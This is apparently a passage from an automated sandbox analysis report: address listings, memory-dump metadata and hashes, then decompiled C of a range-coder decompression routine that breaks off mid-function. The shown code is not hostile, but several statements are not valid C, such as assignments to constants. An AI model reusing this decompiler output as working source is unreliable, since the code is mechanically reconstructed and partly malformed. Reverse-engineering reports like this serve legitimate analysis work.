              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074e1
              0x004074e7
              0x004074e9
              0x004074f0
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
              • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
              • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
              • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406EFA, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00406EFA() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004074FE))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
